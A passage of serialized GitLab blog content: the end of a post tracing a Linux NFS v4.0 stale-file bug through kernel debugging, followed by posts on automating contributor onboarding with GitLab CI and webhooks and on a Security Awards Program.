file, the NFS server tells to Bob to retry via\nthe `NFS4ERR_DELAY` message while it recalls the delegation from Alice\nvia the `CB_RECALL` message (step 3). Alice then returns her delegation\nvia `DELEGRETURN` (step 4), and then Bob attempts to send another\n`RENAME` message (step 5). The `RENAME` completes in both cases, but\nAlice continues to read using the same file handle.\n\n### NFS v4.1 (working case)\n\n![NFS v4.1 flow](https://about.gitlab.com/images/blogimages/nfs-debug/nfs-4.1-flow.svg)\n\nThe main difference happens at the bottom at step 6. Notice in NFS v4.0\n(the stale file case), Alice attempts to reuse the same `stateid`. In\nNFS v4.1 (working case), Alice performs an additional `LOOKUP` and\n`OPEN`, which causes the server to return a different `stateid`. In v4.0,\nthese extra messages are never sent. This explains why Alice continues\nto see stale content because she uses the old file handle.\n\nWhat makes Alice decide to do the extra `LOOKUP`? The delegation recall\nseemed to work fine, but perhaps there was still an issue, such as a\nmissing invalidation step. To rule that out, we disabled NFS delegations\nby issuing this command on the NFS server itself:\n\n```sh\necho 0 > /proc/sys/fs/leases-enable\n```\n\nWe repeated the experiment, but the problem persisted. All this\nconvinced us this wasn't a NFS server issue or a problem with NFS\ndelegations; it was a problem that led us to look into the NFS client\nwithin the kernel.\n\n## Digging deeper: the Linux NFS client\n\nThe first question we had to answer for the NFS maintainers:\n\n### Was this problem still in the latest upstream kernel?\n\nThe issue occurred with both CentOS 7.2 and Ubuntu 16.04 kernels, which\nused versions 3.10.0-862.11.6 and 4.4.0-130, respectively. However, both\nthose kernels lagged the most recent kernel, which was 4.19-rc2 at the\ntime.\n\nWe deployed a new Ubuntu 16.04 virtual machine on Google Cloud Platform\n(GCP), cloned the latest Linux kernel, and set up a kernel development\nenvironment. After generating a `.config` file via `make menuconfig`, we\nchecked two items:\n\n1. The NFS driver was compiled as a module (`CONFIG_NFSD=m`).\n2. The [required GCP kernel settings](https://cloud.google.com/compute/docs/images/building-custom-os)\nwere set properly.\n\nJust as a geneticist would use fruit flies to study evolution in\nreal time, the first item allowed us to make quick changes in the NFS\nclient without having to reboot the kernel. The second item was required\nto ensure that the kernel would actually boot after it was\ninstalled. Fortunately, the default kernel settings had all the settings\nright out of the box.\n\nWith our custom kernel, we verified that the stale file problem still\nexisted in the latest version. That begged a number of questions:\n\n1. Where exactly was this problem happening?\n2. Why was this problem happening with NFS v4.0 but not in v4.1?\n\nTo answer these questions, we began to investigate the NFS [source\ncode](/solutions/source-code-management/). Since we didn't have a kernel debugger available, we sprinkled the\nsource code with two main types of calls:\n\n1. `pr_info()` ([what used to be `printk`](https://lwn.net/Articles/487437/)).\n2. `dump_stack()`: This would show the stack trace of the current function call.\n\nFor example, one of the first things we did was hook into the\n`nfs4_file_open()` function in `fs/nfs/nfs4file.c`:\n\n```c\nstatic int\nnfs4_file_open(struct inode *inode, struct file *filp)\n{\n...\n        pr_info(\"nfs4_file_open start\\n\");\n        dump_stack();\n```\n\nAdmittedly, we could have [activated the `dprintk` messages with the\nLinux dynamic\ndebug](https://www.kernel.org/doc/html/v4.15/admin-guide/dynamic-debug-howto.html)\nor used\n[`rpcdebug`](https://www.thegeekdiary.com/how-to-enable-nfs-debug-logging-using-rpcdebug/),\nbut it was nice to be able to add our own messages to verify changes\nwere being made.\n\nEvery time we made changes, we recompiled the module and reinstalled it\ninto the kernel via the commands:\n\n```sh\nmake modules\nsudo umount /mnt/nfs-test\nsudo rmmod nfsv4\nsudo rmmod nfs\nsudo insmod fs/nfs/nfs.ko\nsudo mount -a\n```\n\nWith our NFS module installed, repeating the experiments would print\nmessages that would help us understand the NFS code a bit more. For\nexample, you can see exactly what happens when an application calls `open()`:\n\n```\nSep 24 20:20:38 test-kernel kernel: [ 1145.233460] Call Trace:\nSep 24 20:20:38 test-kernel kernel: [ 1145.233462]  dump_stack+0x8e/0xd5\nSep 24 20:20:38 test-kernel kernel: [ 1145.233480]  nfs4_file_open+0x56/0x2a0 [nfsv4]\nSep 24 20:20:38 test-kernel kernel: [ 1145.233488]  ? nfs42_clone_file_range+0x1c0/0x1c0 [nfsv4]\nSep 24 20:20:38 test-kernel kernel: [ 1145.233490]  do_dentry_open+0x1f6/0x360\nSep 24 20:20:38 test-kernel kernel: [ 1145.233492]  vfs_open+0x2f/0x40\nSep 24 20:20:38 test-kernel kernel: [ 1145.233493]  path_openat+0x2e8/0x1690\nSep 24 20:20:38 test-kernel kernel: [ 1145.233496]  ? mem_cgroup_try_charge+0x8b/0x190\nSep 24 20:20:38 test-kernel kernel: [ 1145.233497]  do_filp_open+0x9b/0x110\nSep 24 20:20:38 test-kernel kernel: [ 1145.233499]  ? __check_object_size+0xb8/0x1b0\nSep 24 20:20:38 test-kernel kernel: [ 1145.233501]  ? __alloc_fd+0x46/0x170\nSep 24 20:20:38 test-kernel kernel: [ 1145.233503]  do_sys_open+0x1ba/0x250\nSep 24 20:20:38 test-kernel kernel: [ 1145.233505]  ? do_sys_open+0x1ba/0x250\nSep 24 20:20:38 test-kernel kernel: [ 1145.233507]  __x64_sys_openat+0x20/0x30\nSep 24 20:20:38 test-kernel kernel: [ 1145.233508]  do_syscall_64+0x65/0x130\n```\n\nWhat are the `do_dentry_open` and `vfs_open` calls above? Linux has a\n[virtual filesystem\n(VFS)](https://www.kernel.org/doc/Documentation/filesystems/vfs.txt), an\nabstraction layer which provides a common interface for all\nfilesystems. The VFS documentation explains:\n\n> The VFS implements the open(2), stat(2), chmod(2), and similar system\n> calls. The pathname argument that is passed to them is used by the VFS\n> to search through the directory entry cache (also known as the dentry\n> cache or dcache). This provides a very fast look-up mechanism to\n> translate a pathname (filename) into a specific dentry. Dentries live\n> in RAM and are never saved to disc: they exist only for performance.\n\n### This gave us a clue: what if this was a problem with the dentry cache?\n\nWe noticed a lot of dentry cache validation was done in\n`fs/nfs/dir.c`. In particular, `nfs4_lookup_revalidate()` sounded\npromising. As an experiment, we hacked that function to bail\nout early:\n\n\n```diff\ndiff --git a/fs/nfs/dir.c b/fs/nfs/dir.c\nindex 8bfaa658b2c1..ad479bfeb669 100644\n--- a/fs/nfs/dir.c\n+++ b/fs/nfs/dir.c\n@@ -1159,6 +1159,7 @@ static int nfs_lookup_revalidate(struct dentry *dentry, unsigned int flags)\n        trace_nfs_lookup_revalidate_enter(dir, dentry, flags);\n        error = NFS_PROTO(dir)->lookup(dir, &dentry->d_name, fhandle, fattr, label);\n        trace_nfs_lookup_revalidate_exit(dir, dentry, flags, error);\n+       goto out_bad;\n        if (error == -ESTALE || error == -ENOENT)\n                goto out_bad;\n        if (error)\n```\n\nThat made the stale file problem in our experiment go away! Now we were onto something.\n\nTo answer, \"Why does this problem not happen in NFS v4.1?\", we added\n`pr_info()` calls to every `if` block in that function. After running our\nexperiments with NFS v4.0 and v4.1, we found this special condition being run\nin the v4.1 case:\n\n```c\n        if (NFS_SB(dentry->d_sb)->caps & NFS_CAP_ATOMIC_OPEN_V1) {\n          goto no_open;\n        }\n```\n\nWhat is `NFS_CAP_ATOMIC_OPEN_V1`? We saw [this kernel\npatch](https://patchwork.kernel.org/patch/2300511/) mentioned this was\nan NFS v4.1-specific feature, and the code in `fs/nfs/nfs4proc.c`\nconfirmed that this flag was a capability present in v4.1 but not in v4.0:\n\n```c\nstatic const struct nfs4_minor_version_ops nfs_v4_1_minor_ops = {\n        .minor_version = 1,\n        .init_caps = NFS_CAP_READDIRPLUS\n                | NFS_CAP_ATOMIC_OPEN\n                | NFS_CAP_POSIX_LOCK\n                | NFS_CAP_STATEID_NFSV41\n                | NFS_CAP_ATOMIC_OPEN_V1\n```\n\nThat explained the difference in behavior: in the v4.1 case, the `goto\nno_open` would cause more validation to happen in\n`nfs_lookup_revalidate()`, but in v4.0, the `nfs4_lookup_revalidate()`\nwould return earlier. Now, how do we actually solve the problem?\n\n## The solution\n\nI reported the [findings to the NFS mailing\nlist](https://marc.info/?l=linux-nfs&m=153782129412452&w=2) and proposed\n[a naive patch](https://marc.info/?l=linux-nfs&m=153807208928650&w=2). A\nweek after the report, Trond Myklebust sent a [patch series to the list\nfixing this bug and found another related issue for NFS\nv4.1](https://marc.info/?l=linux-nfs&m=153816500525563&w=2).\n\nIt turns out the fix for the NFS v4.0 bug was deeper in the code base\nthan we had looked. Trond summarized it well in the\n[patch](https://marc.info/?l=linux-nfs&m=153816500525564&w=2):\n\n> We need to ensure that inode and dentry revalidation occurs correctly\n> on reopen of a file that is already open. Currently, we can end up not\n> revalidating either in the case of NFSv4.0, due to the 'cached open'\n> path.  Let's fix that by ensuring that we only do cached open for the\n> special cases of open recovery and delegation return.\n\nWe confirmed that this fix made the stale file problem go away and filed\nbug reports with\n[Ubuntu](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1802585)\nand [RedHat](https://bugzilla.redhat.com/show_bug.cgi?id=1648482).\n\nKnowing full well that kernel changes may take a while to make it to\nstable releases, we also added a [workaround in\nGitaly](https://gitlab.com/gitlab-org/gitaly/merge_requests/924) to deal\nwith this issue. We did experiments to test that calling `stat()` on the\n`packed-refs` file appears to cause the kernel to revalidate the dentry\ncache for the renamed file. For simplicity, this is implemented in\nGitaly regardless of whether the filesystem is NFS; we only do this once\nbefore Gitaly \"opens\" a repository, and there are already other `stat()`\ncalls that check for other files.\n\n## What we learned\n\nA bug can be anywhere in your software stack, and sometimes you have to\nlook beyond your application to find it. Having helpful partners in the\nopen source world makes that job much easier.\n\nWe are extremely grateful to Trond Myklebust for fixing the problem, and\nBruce Fields for responding to questions and helping us understand\nNFS. Their responsiveness and professionalism truly reflects the best of\nthe open source community.\n\nPhoto by [dynamosquito](https://www.flickr.com/photos/dynamosquito) on [Flickr](https://www.flickr.com/photos/dynamosquito/4265771518)\n{: .note}\n",[267,751,803,9],{"slug":3271,"featured":6,"template":689},"how-we-spent-two-weeks-hunting-an-nfs-bug","content:en-us:blog:how-we-spent-two-weeks-hunting-an-nfs-bug.yml","How We Spent Two Weeks Hunting An Nfs Bug","en-us/blog/how-we-spent-two-weeks-hunting-an-nfs-bug.yml","en-us/blog/how-we-spent-two-weeks-hunting-an-nfs-bug",{"_path":3277,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3278,"content":3281,"config":3289,"_id":3291,"_type":14,"title":3292,"_source":16,"_file":3293,"_stem":3294,"_extension":19},"/en-us/blog/how-we-use-gitlab-to-grow-open-source-communities",{"noIndex":6,"title":3279,"description":3280},"How we use GitLab to grow open source communities","Learn how to use the DevSecOps platform to solve onboarding problems for new contributors.",{"title":3279,"description":3280,"body":3282,"authors":3283,"heroImage":3286,"category":10,"tags":3287,"date":3288},"\nGitLab's Contributor Success team faced a challenge.\nWhile our returning open source contributors were merging more code changes and collaborating on deeper features, first-time contributors were struggling to get started. We knew many newcomers to open source often gave up or never asked for help. But as advocates for [GitLab's mission](https://handbook.gitlab.com/handbook/company/mission/)\nto enable everyone to contribute, we wanted to do better.\n\nWe started running research studies on open source contributors to GitLab. Then we improved the stumbling blocks. In January, we achieved a record of 184 unique community contributors to GitLab in a single month,\nexceeding our team target of 170 for the first time.\n\nThree months later, we broke it again with 192.\n\nHere's how we used GitLab's own tools to solve the newcomer dilemma and grow our open source community.\n\n## What we learned studying first-time contributors\n\nIn 2023, we conducted the first-ever user study of GitLab open source contributors.\nWe watched six participants who had never contributed to GitLab make their first attempt. They completed diary studies and Zoom interviews detailing their experience.\n\nParticipants told us:\n\n* The contributor documentation was confusing\n* Getting started felt overwhelming\n* It wasn't clear how or where to find help\n\nOnly one out of the six participants successfully merged a code contribution to GitLab during the study.\n\nIt became clear we needed to focus on the onboarding experience if we wanted new contributors to succeed.\nSo we [iterated](https://handbook.gitlab.com/handbook/values/#iteration)!\n\nOur team spent the next year addressing their challenges. We used GitLab tools,\nsuch as issue templates, scheduled pipelines, webhooks, and the GitLab Query Language (GLQL), to build an innovative semi-automated onboarding solution.\n\nIn 2025, we performed a follow-up user study with new participants who had never made a contribution to GitLab. All 10 participants successfully created and merged contributions to GitLab, a 100% success rate. The feedback showed a great appreciation for the new onboarding process, the speed at which\nmaintainers checked in on contributors, and the recognition we offered to contributors.\n\nEven better, participants shared how much fun they had contributing:\n\"I felt a little rush of excitement at being able to say 'I helped build GitLab.'\"\n\n## We built personal onboarding with GitLab\n\nOur solution started with engagement.\nTo help newcomers get started, we introduced a personal onboarding process connecting each\ncontributor with a community maintainer.\n\nWe created an [issue template](https://gitlab.com/gitlab-community/meta/-/blob/ac0e5579a6a1cf26e367010bfcf6c7d35b38d4f8/.gitlab/issue_templates/Onboarding.md) with a clear checklist of tasks.\n\nThe onboarding issue also handles access approval for the\n[GitLab community forks](https://about.gitlab.com/blog/gitlab-community-forks/),\na collection of shared projects that make it easier to push changes, collaborate with others,\nand access GitLab Ultimate and Duo features.\n\nUsing [scoped labels](https://docs.gitlab.com/user/project/labels/#scoped-labels), we indicate the status of the access request for easy maintainer follow-ups.\n\n![GitLab onboarding issue](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/vkiyl0hrfbgcer3nz38r.png)\n\nWe started with a Ruby script run via a [scheduled pipeline](https://docs.gitlab.com/ci/pipelines/schedules/),\nchecking for new access requests and using the issue template to create personalized onboarding issues.\n\nFrom here, our maintainers engage with new contributors to verify access, answer questions, and find issues.\n\n## We standardized responses with comment templates\n\nWith multiple maintainers in the GitLab community, we wanted to ensure consistent and clear messaging.\n\nWe created [comment templates](https://docs.gitlab.com/user/profile/comment_templates/),\nwhich we sync with the repository using the GraphQL API and a\n[Ruby script](https://gitlab.com/gitlab-community/meta/-/blob/dd6e0c2861c848251424b72e3e8c5603dcaac725/bin/sync_comment_templates.rb).\n\nThe script is triggered in `.gitlab-ci.yml` when comment template changes are pushed\nto the default branch (a dry run is triggered in merge requests).\n\n```yaml\nexecute:sync-comment-templates:\n  stage: execute\n  extends: .ruby\n  script:\n    - bundle exec bin/sync_comment_templates.rb\n  variables:\n    SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_ONLY\n  rules:\n    - if: $CI_PIPELINE_SOURCE == 'schedule' || $CI_PIPELINE_SOURCE == \"trigger\"\n      when: never\n    - if: $EXECUTE_SYNC_COMMENT_TEMPLATES == '1'\n    - if: $CI_MERGE_REQUEST_IID\n      changes:\n        - .gitlab/comment_templates/**/*\n      variables:\n        REPORT_ONLY: 1\n    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH\n      changes:\n        - .gitlab/comment_templates/**/*\n      variables:\n        FORCE_SYNC: 1\n        DRY_RUN: 0\n        SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_WRITE\n```\n\n\n\n![GitLab comment template](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/qmfaymqhq3zgdcnm6a3j.png)\n\n\n\n## We eliminated the 5-minute wait time\n\nOur first iteration was a little slow.\nAfter starting the onboarding process, contributors wondered what to do next while the scheduled\npipeline took up to 5 minutes to create their onboarding issue.\nFive minutes feels like forever when you have the momentum to dive in.\n\n[Niklas](https://gitlab.com/Taucher2003), a member of our [Core team ](https://about.gitlab.com/community/core-team/), built a solution.\nHe added [webhook events for access requests](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/163094)\nand [custom payload templates for webhooks](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/142738).\n\nThese features together allowed us to trigger a pipeline immediately instead of waiting for the schedule.\nThis reduces the time to roughly 40 seconds (the time it takes for the CI pipeline to run)\nand generates the onboarding issue right away. It also saves thousands of wasted pipelines and compute minutes when no access requests actually need processing.\n\nWe set up a [pipeline trigger token](https://docs.gitlab.com/ci/triggers/#create-a-pipeline-trigger-token)\nand used this as the target for the webhook, passing the desired environment variables:\n\n```json\n{\n  \"ref\": \"main\",\n  \"variables\": {\n    \"EXECUTE_ACCESS_REQUESTS\": \"1\",\n    \"DRY_RUN\": \"0\",\n    \"PIPELINE_NAME\": \"Create onboarding issues\",\n    \"GROUP_ID\": \"{{group_id}}\",\n    \"EVENT_NAME\": \"{{event_name}}\"\n  }\n}\n```\n\n![Pipeline list](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512805/qom7hnqnwfcdzvria7dd.png)\n\n## We automated follow-ups\n\nWith an increasing volume of customers and community contributors onboarding to the GitLab community,\nmaintainers struggled to track which issues needed attention and some follow-up questions got lost.\n\nWe built automation leveraging webhooks and Ruby to label issues updated by community members.\nThis creates a clear signal of issue status for maintainers.\n\n[GitLab Triage](https://gitlab.com/gitlab-org/ruby/gems/gitlab-triage)\nautomatically nudges idle onboarding issues to ensure we maintain contributor momentum.\n\n![Automated nudge for idle GitLab onboarding issues](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512811/gkj3qaidjl1vv2dlu8ep.png)\n\n## We organized issue tracking with GLQL\n\nWe built a [GLQL view](https://docs.gitlab.com/user/glql/) to keep track of issues.\nThis GLQL table summarizes onboarding issues which need attention,\nso maintainers can review and follow up with community members.\n\n![GLQL view of issue tracking](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/hdduf0orntdfhkysheae.png)\n\nThese GLQL views improved our overall triage [efficiency](https://handbook.gitlab.com/handbook/values/#efficiency).\nIt was so successful we ended up using this strategy within the [GitLab for Open Source](https://about.gitlab.com/solutions/open-source/)\nand [GitLab for Education](https://about.gitlab.com/solutions/education/) programs, too.\nWith GLQL tables for support issues, these community programs lowered their response times by 75%.\n\n## We made the README findable\n\nThe [@gitlab-community group](https://gitlab.com/gitlab-community/)\nis the home for contributors on Gitlab.com.\nWe already had a `README.md` file explaining the community forks and onboarding process, but this file\nlived in our meta project.\nWith our follow-up user study, we discovered this was a point of confusion for newcomers when their\nonboarding issues were under a different project.\n\nWe used [GitLab's project mirroring](https://docs.gitlab.com/user/project/repository/mirror/)\nto solve this and mirrored the meta project to `gitlab-profile`.\nThis surfaced the existing README file at the group level, making it easier to discover.\n\n![GitLab project mirroiring](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512809/kbgdxyilza71kmj0aeqt.png)\n\n![Group README](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/taosgn8vvgo8onszuwaf.png)\n\n## The results speak for themselves\n\nBy dogfooding GitLab, we improved the stumbling blocks found in our research studies\nand transformed the GitLab contributor journey.\nWe have grown the number of customers and community members contributing to GitLab,\nadding features to the product, solving bugs, and adding to our CI/CD catalog.\n\nOur onboarding process has increased the rate newcomers join the community, and our total number of\ncontributors on the community forks has doubled over the last 9 months.\n\n![Community forks growth chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/xagra4vfsrhbcwnzekmp.png)\n\nWe reduced the time it takes for newcomers to make their first contribution by connecting them\nwith maintainers faster and supporting them in getting started.\nWe use [GitLab's value stream analytics](https://docs.gitlab.com/user/group/value_stream_analytics/)\nto track our response rates.\n\n* First response time from community maintainers is down to 46 minutes over the last 3 months\n* Average approval time for community forks access is down to 1 hour over the last 3 months\n\n![Value stream analytics timeline](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512812/jzksakrfdb22hooqemzh.png)\n\nThe 100% success rate of our 2025 user study confirmed these improvements for our first-time contributors.\n\n## We invested time savings into contributor recognition\n\nFixing these newcomer challenges allowed us more capacity to focus on better recognition of\ncontributors, incentivizing first-timers to keep coming back.\nThe result is [contributors.gitlab.com](https://contributors.gitlab.com/).\nWe built out a central hub for our contributors that features gamified leaderboards,\nachievements, and rewards.\nContributors can see their impact, track progress, and grow in the community.\n\n## Sharing what we learned\n\nThese improvements work and are repeatable for other open source projects.\nWe are sharing our approach across communities and conferences so that other projects can consider using these tools to grow.\n\nAs more organizations learn the barriers to participation, we can create a more welcoming open source environment.\nWith these GitLab tools, we can offer a smoother experience for both contributors and maintainers.\nWe're committed to advancing this work and collaborating to remove barriers for open source projects everywhere.\n\n## Start the conversation\n\nWant to learn more about growing your contributor community?\nEmail `contributors@gitlab.com` or [open an issue](https://gitlab.com/gitlab-org/developer-relations/contributor-success/team-task/-/issues)\nto start a discussion.\nWe're here to help build communities.",[3284,3285],"Lee Tickett","Daniel Murphy","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099558/Blog/Hero%20Images/Blog/Hero%20Images/gitlabflatlogomap_gitlabflatlogomap.png_1750099558369.png",[9,267,1495],"2025-07-15",{"featured":6,"template":689,"slug":3290},"how-we-use-gitlab-to-grow-open-source-communities","content:en-us:blog:how-we-use-gitlab-to-grow-open-source-communities.yml","How We Use Gitlab To Grow Open Source Communities","en-us/blog/how-we-use-gitlab-to-grow-open-source-communities.yml","en-us/blog/how-we-use-gitlab-to-grow-open-source-communities",{"_path":3296,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3297,"content":3303,"config":3309,"_id":3311,"_type":14,"title":3312,"_source":16,"_file":3313,"_stem":3314,"_extension":19},"/en-us/blog/how-we-used-gitlab-values-to-build-a-security-awards-program",{"title":3298,"description":3299,"ogTitle":3298,"ogDescription":3299,"noIndex":6,"ogImage":3300,"ogUrl":3301,"ogSiteName":673,"ogType":674,"canonicalUrls":3301,"schema":3302},"How we used GitLab values to develop a successful Security Awards Program","We built a program that encourages, recognizes, and awards a shared responsibility for security.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681989/Blog/Hero%20Images/security-awards-blog.png","https://about.gitlab.com/blog/how-we-used-gitlab-values-to-build-a-security-awards-program","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we used GitLab values to develop a successful Security Awards Program\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Philippe Lafoucrière\"}],\n        \"datePublished\": \"2021-05-14\",\n      }",{"title":3298,"description":3299,"authors":3304,"heroImage":3300,"date":3306,"body":3307,"category":865,"tags":3308},[3305],"Philippe Lafoucrière","2021-05-14","\n\nSecurity is our [top priority](/handbook/product/product-processes/#prioritization) at GitLab, and like many software companies, we believe security \"is everyone's responsibility\". The more GitLab team and community members are involved, the better. However, we're also scaling quickly, delivering new and large features often and need to stay focused and aligned with our value of [results](https://handbook.gitlab.com/handbook/values/#results).\n\nBecause of this focus and pace, blind spots can develop when it comes to security, so extra hands, minds, and eyes bring immense value. All security contributions to our documentation, product, and workflow are \"actions\" we want to recognize and programs that celebrate those who go the extra-mile, think out-of-the-box, or cautiously assess threats and risk, are a great reminder that everyone can contribute to the ongoing effort that is security. This is why we created the [Security Awards Program](/handbook/security/security-awards-program.html).\n\n## How we built a Security Awards Program using GitLab values\n\nThe program, opened in 2020, is a simple construct: Every valid submission (or action) earns the reporter points and recognition, and prizes are awarded at the end of each quarter. All non-Security team members and community members are eligible to win a grand prize at the end of the year, where the individual with the highest number of points is awarded the top prize.\n\n### Efficiency: Start boring\n\nAt GitLab, every new project is an opportunity to live and apply our values. My personal favorite, [efficiency](https://handbook.gitlab.com/handbook/values/#efficiency), helped us start with a boring solution. The minimum achievement to start the program was to define a basic rule, and document it in our handbook. Nothing more. From this [initial merge request](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/59279), we kicked off program communications and experimented with the first results. The feedback loop was extremely short, and adjustments were made accordingly.\n\n### Iteration: Improve it as you go along\n\nBecause a successful program needs to scale with time, [iteration](https://handbook.gitlab.com/handbook/values/#iteration) is key to maintain momentum and quickly improve. The first security award nominations arrived soon after we added the concept of the program to our handbook. To easily keep track of them and enable quick updates, we created a simple markdown file hosted in a specific project. While everything could have stayed the same, we knew automation would help us avoid human errors and ensure the program would scale. [Work done this past quarter](https://gitlab.com/groups/gitlab-com/gl-security/-/epics/105) means the nominations are now fetched weekly, the associated data updated and validated, and everything is published automatically.\n\nAnother recent iteration in our Security Awards Program is the move to [automatically reward security merge requests](/handbook/security/security-awards-program.html#automatic-rewards) (merged) that fix a security bug. Our product is not exempt from bugs or security issues and we saw the number of S3s and S4s (learn more about how we apply [severity labels](/handbook/security/#severity-and-priority-labels-on-security-issues)) rising lately.  Adding automatic rewards to target and incentivize identifying these security issues is predictable, simple to employ, and helps us reduce security bugs.\n\n### Collaboration: Everyone adds value\n\nTo be successful, we knew we needed a thriving program that enabled [collaboration](https://handbook.gitlab.com/handbook/values/#collaboration) across the organization and beyond. We work with our AppSec team to identify the initiatives we want to encourage and incentivize, as well as on the overall evaluation of submitted \"actions\". The workflow here is simple: Once it is identified, an \"action\" (an issue or a merge request) is labeled with a \"nomination\" label. Every week, the nominations are imported into a single awards council issue in GitLab for asynchronous discussion. Each nomination is a [thread](https://docs.gitlab.com/ee/user/discussions/) in the council issue, and we use [award emojis](https://docs.gitlab.com/ee/user/award_emojis.html) to set the number of votes. Votes translate to points awarded to the author of the \"action\".\n\n![Screenshot of GitLab Bot message in issue](https://about.gitlab.com/images/blogimages/gitlab-bot-awards-message.png){: .shadow.medium.center}\nWe engage with nominees when they're awarded, extending the visibility of the program and providing an instant feedback loop.\n{: .note.text-center}\n\n### Diversity, inclusion and belonging: New, better ideas\n\nRemember that at GitLab, everyone can contribute. Contributions from the wider GitLab community are essential to maintaining the level of security we expect for our product. The broad and diverse talents of the global GitLab community and our [diversity, inclusion, and belonging](https://handbook.gitlab.com/handbook/values/#diversity-inclusion) value drive inclusivity into this program and we're proud that [community contributions](/handbook/security/security-awards-program.html#community-contributions) play a key role in this program. We also have multiple categories for submissions to encourage participation from engineers and non-engineers alike to ensure we have diversity of thought and innovation.\n\n#### 👉 We want your contributions! 🙌\nThere are multiple ways to contribute and you can see them outlined in this [contribution guide](/community/contribute/). Any [actions that contribute to the security of GitLab](/handbook/security/security-awards-program.html#eligible-actions) are considered and have the potential to be recognized in our Security Awards Program.\n\nNote: For bug bounty hunters interested in researching security vulnerabilities on our platform,  we have a [bug bounty program on HackerOne](https://hackerone.com/gitlab?type=team) where security researchers are invited to submit security bug reports directly for bounties. Those submissions are not considered under this program, but are still really important to us.\n\n### Results: Security fixes and awareness\n\nThis one is easy. The more bugs we spot and fix, the stronger our product is for our customers, the broader community, and our own teams, who use GitLab daily. Beyond this, the Security Awards Program is a great way to spread knowledge about what we're prioritizing on the Security team and the GitLab issues we use for awards council voting and discussion are a nice weekly resource to generate awareness of changes that matter!\n\n### Transparency: Increases visibility and collaboration\n\nThe final GitLab value at play here is – last but not least – [transparency](https://handbook.gitlab.com/handbook/values/#transparency). It's been widely acknowledged that transparency and security don't always easily mix. And, sure, we admit it's more difficult, but not impossible. Our Security Awards Program is meant to be as transparent as possible, while ensuring no confidential information is leaked through our pipelines. We also try to [dogfood as much as we can](/handbook/product/product-processes/#dogfood-everything) here, so the transparency around this program presents a great opportunity to experiment with our new [threat modeling process](/handbook/security/threat_modeling/). This careful review allows us to keep the source code open and make the whole process available in the handbook. While the \"actions\" rewarded are often confidential since they are related to vulnerabilities or security issues, the [leaderboard with the awarded people](/handbook/security/awards/leaderboard-fy22.html) is completely public.\n\nOur journey to recognize security initiatives is just getting started. Fleshed out in the spirit of our values, our Security Awards Program is showing constant progress and results, leading to security awareness, engagement, and a more secure organization and product.\n\n## Congrats and thank you to our current top 10 contributors 🎉 :\n\n| Contributor | Rank in their category | Points |\n| [@cablett](/company/team/#cablett) | 1 | 600 |\n| [@alexkalderimis](/company/team/#alexkalderimis) | 2 | 500 |\n| [@engwan](/company/team/#engwan) | 3 | 480 |\n| [@whaber](/company/team/#whaber) | 4 | 400 |\n| [@alexpooley](/company/team/#alexpooley) | 5 | 400 |\n| [@theoretick](/company/team/#theoretick) | 6| 400 |\n| [@sabrams](/company/team/#sabrams) | 7 | 300 |\n| [@tmaczukin](/company/team/#tmaczukin) | 8 | 300 |\n| [@nolith](/company/team/#nolith) | 1 | 300 |\n| [@emanuele.divizio](https://gitlab.com/emanuele.divizio) | 1 | 300 |\n\nHow do you reward and recognize security fixes in your organization? Is there something more or different we could do in our Security Awards Program? Tell us in the comments!\n",[865,803,9],{"slug":3310,"featured":6,"template":689},"how-we-used-gitlab-values-to-build-a-security-awards-program","content:en-us:blog:how-we-used-gitlab-values-to-build-a-security-awards-program.yml","How We Used Gitlab Values To Build A Security Awards Program","en-us/blog/how-we-used-gitlab-values-to-build-a-security-awards-program.yml","en-us/blog/how-we-used-gitlab-values-to-build-a-security-awards-program",{"_path":3316,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3317,"content":3323,"config":3328,"_id":3330,"_type":14,"title":3331,"_source":16,"_file":3332,"_stem":3333,"_extension":19},"/en-us/blog/how-you-contribute-to-gitlabs-open-devops-platform",{"title":3318,"description":3319,"ogTitle":3318,"ogDescription":3319,"noIndex":6,"ogImage":3320,"ogUrl":3321,"ogSiteName":673,"ogType":674,"canonicalUrls":3321,"schema":3322},"How you contribute to GitLab's DevOps Platform","Today we're celebrating you! These are just some of the many examples of how you make GitLab's DevOps Platform better by innovating together.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664041/Blog/Hero%20Images/open-devops.png","https://about.gitlab.com/blog/how-you-contribute-to-gitlabs-open-devops-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How you contribute to GitLab's DevOps Platform\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-03-23\",\n      }",{"title":3318,"description":3319,"authors":3324,"heroImage":3320,"date":2561,"body":3325,"category":10,"tags":3326},[970],"\n\nWe know that we can iterate faster when we innovate together. We want to highlight how you make GitLab better every day by contributing to our DevOps Platform, by suggesting improvements, submitting bug fixes, and contributing features. \n\nYou contribute around 300 merge requests to GitLab each month. Just look at [last month's release for a multitude of examples](/releases/2021/02/22/gitlab-13-9-released/#wider-community-contribution-highlights) – a reminder that [everyone can contribute](/company/mission/#mission). \n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote 